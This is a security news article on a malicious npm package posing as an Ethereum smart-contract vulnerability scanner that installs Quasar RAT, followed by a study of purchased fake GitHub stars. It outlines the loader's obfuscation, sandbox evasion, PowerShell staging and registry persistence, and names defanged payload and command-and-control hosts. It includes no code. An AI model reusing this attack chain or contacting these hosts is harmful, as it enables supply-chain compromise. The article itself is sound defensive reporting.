Cybersecurity researchers have uncovered a malicious npm package disguised as a tool for detecting vulnerabilities in Ethereum smart contracts. Instead of aiding developers, this package stealthily installs Quasar RAT, an open-source remote access trojan (RAT), on affected systems.
The Malicious Package: ethereumvulncontracthandler
The npm package, named ethereumvulncontracthandler, was published on December 18, 2024, by a user identified as "solidit-dev-416." Despite its dangerous nature, the package remains available for download on the npm registry and has been downloaded 66 times to date.
Upon installation, the package executes a malicious script retrieved from a remote server, silently deploying Quasar RAT on Windows systems. "The malware is heavily obfuscated to evade detection and uses encoding techniques like Base64 and XOR, along with minification," explains Kirill Boychenko, a security researcher at Socket.
How the Attack Works
The attack proceeds as follows:
- Obfuscation and Evasion: The malicious code within the package is layered with multiple obfuscation techniques, making analysis challenging.
- Environment Checks: The malware avoids execution in sandboxed or virtualized environments.
- Payload Delivery: It acts as a loader, fetching a second-stage payload from a remote server (
jujuju[.]lat). - PowerShell Commands: These commands initiate the execution of Quasar RAT.
- Persistence and C2 Communication: The RAT modifies the Windows Registry to maintain persistence and connects to a command-and-control (C2) server (
captchacdn[.]com:7000) to receive further instructions.
Quasar RAT enables threat actors to fully compromise the victim’s machine, allowing them to monitor activities, exfiltrate sensitive data, and control the system remotely.
Quasar RAT: A Persistent Threat
Quasar RAT, originally released on GitHub in July 2014, is a widely used malware tool employed in both cybercrime and cyber-espionage campaigns. Its capabilities include:
- Keylogging
- Screen and webcam capture
- File exfiltration
- Command execution
"The attackers use the C2 server to manage multiple infected machines, making it possible to build a botnet or conduct targeted surveillance," Boychenko adds.
Fake GitHub Stars: A Growing Cybersecurity Concern
The discovery of this malicious npm package coincides with a surge in fake GitHub stars—a tactic used to artificially inflate the popularity of malware-laced repositories.
A joint study by Socket, Carnegie Mellon University, and North Carolina State University reveals that millions of fake stars are being used to promote malware repositories disguised as pirating tools, cryptocurrency bots, and game cheats.
The Market for Fake Stars
Promoted by services like Baddhi Shop, BuyGitHub, and Twidium, these fake stars are available for purchase, with prices starting at $110 for 1,000 stars. These stars are often employed to falsely enhance repository credibility and attract unsuspecting developers.
Key findings from the study include:
- 4.5 million fake stars traced to 1.32 million accounts and 22,915 repositories.
- 60% of fake star accounts exhibit trivial activity patterns, indicating bot-like behavior.
- Few repositories using fake stars are published on npm or PyPI, and even fewer gain widespread adoption.
The Risk of Misleading Metrics
The research highlights the unreliability of GitHub star counts as indicators of repository quality. "Star counts can easily be inflated with bot accounts or low-reputation users," the researchers noted.
To mitigate these issues, the study suggests GitHub implement a weighted metric for repository popularity based on network centrality and other dimensions.
In response, GitHub stated it actively works to remove fake star accounts and improve platform security.
Key Takeaways for Developers
As the open-source supply chain remains a prime target for attackers, developers must adopt strict security practices, including:
- Carefully reviewing package metadata before installation.
- Using tools like Socket, Snyk, or npm audit to detect potential risks.
- Verifying repository activity for signs of fake engagement.
The rise of malicious npm packages and fake GitHub stars underscores the importance of vigilance in open-source software development. Trust metrics like star counts must be supplemented with thorough reviews to ensure the integrity of dependencies.